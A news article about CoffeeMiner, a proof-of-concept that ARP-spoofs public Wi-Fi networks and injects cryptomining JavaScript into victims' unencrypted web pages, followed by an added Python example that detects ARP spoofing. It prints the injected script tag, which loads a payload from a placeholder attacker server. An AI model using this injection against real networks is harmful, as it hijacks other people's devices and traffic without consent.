Thanks to the ridiculous valuation of Bitcoin and other cryptocurrencies, cryptomining code has become a common mechanism for converting authorized and stolen computing cycles into potential cash.

Antivirus and ad-blocker makers have responded by trying to halt crafty coin-crafting code from hijacking CPU time, particularly in browsers.

For those interested in violating computer laws – please, don't – and those interested in computer security research projects, a developer named Arnau, based in Spain, has published a proof-of-concept walkthrough for hacking public Wi-Fi networks to inject crypto-mining code in connected browsing sessions.

CoffeeMiner is a project that allows the sort of man-in-the-middle attack that has been used by cyber thieves in Starbucks cafes and doubtless elsewhere.

The CoffeeMiner script is designed to spoof Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

It in turn conducts a man-in-the-middle attack using software called mitmproxy to inject the following line of HTML code into non-HTTPS, or otherwise non-encrypted, webpages requested by others on the network:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

When loaded, these webpages run the JavaScript and siphon CPU time to generate Monero, a cryptocurrency, using CoinHive's crypto-mining software.

As Arnau explained, the attack – demonstrated on a VirtualBox setup rather than in the wild – can be automated. The published version doesn't work with requests for HTTPS webpages, though the addition of sslstrip could solve that.
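The ARP-spoofing step described above leaves a visible trace in a victim's neighbour table, and the following added example (not code from the article or from the CoffeeMiner project) shows one way to check for it. It assumes the text format printed by Linux's `ip neigh show`; the addresses are constructed sample data and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` output (not captured from a real network).
BASELINE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr aa:bb:cc:00:00:17 STALE
192.168.1.42 dev wlan0 lladdr aa:bb:cc:00:00:2a REACHABLE
"""
# Constructed: the same table after the host at .42 answers ARP for the gateway.
POISONED = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:00:00:2a REACHABLE
192.168.1.23 dev wlan0 lladdr aa:bb:cc:00:00:17 STALE
192.168.1.42 dev wlan0 lladdr aa:bb:cc:00:00:2a REACHABLE
192.168.1.77 dev wlan0 FAILED
"""

NEIGH = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac}, skipping entries with no link-layer address (FAILED etc.)."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table

def arp_findings(baseline, current, gateway):
    """Compare two neighbour tables and report signs of ARP spoofing."""
    findings = []
    old, new = baseline.get(gateway), current.get(gateway)
    if old and new and old != new:
        # The gateway's MAC differs from the one recorded earlier.
        findings.append(("gateway-mac-changed", gateway, old, new))
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        # Another host's IP resolves to the same MAC as the gateway.
        if len(ips) > 1 and gateway in ips:
            findings.append(("mac-shared-with-gateway", mac, sorted(ips)))
    return findings

if __name__ == "__main__":
    for f in arp_findings(parse_neigh(BASELINE), parse_neigh(POISONED), "192.168.1.1"):
        print(f)
```

A router that legitimately holds several addresses on one interface will also trip the shared-MAC check, so the baseline comparison is the stronger signal of the two.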

The code, mostly Python, is available on GitHub. ®